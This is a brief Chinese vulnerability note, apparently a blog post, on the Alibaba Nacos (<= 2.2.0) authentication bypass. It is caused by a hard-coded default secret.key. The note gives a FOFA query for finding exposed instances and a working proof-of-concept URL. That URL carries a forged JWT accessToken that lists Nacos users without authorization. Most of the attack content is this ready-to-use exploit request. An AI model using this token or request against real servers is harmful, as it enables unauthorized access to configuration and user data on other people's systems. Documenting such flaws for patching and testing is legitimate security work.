Alibaba Nacos 使用了固定的secret.key默认密钥,导致攻击者可以构造请求获取敏感信息,导致未授权访问漏洞
Alibaba Nacos <= 2.2.0
app="NACOS"
登陆页面
漏洞原因是由于使用了固定的Key
验证POC
/nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ&pageNo=1&pageSize=9
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!